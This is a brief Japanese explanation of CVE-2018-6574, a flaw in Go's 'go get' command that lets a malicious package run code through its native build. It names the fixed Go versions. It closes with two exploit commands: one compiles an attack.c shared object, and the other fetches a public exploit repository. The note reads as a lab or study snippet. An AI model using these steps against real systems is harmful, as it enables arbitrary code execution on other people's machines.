
CVE-2018-6574 この脆弱性はGolangのgo getコマンドに影響を与え、攻撃者が悪意のあるライブラリをインストールすることでシステム上でコード実行を取得することを可能にします。この脆弱性はGo 1.8. 7、1.9. 4、および1.10rc2で修正されました。Golangはネイティブ拡張をビルドします。
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit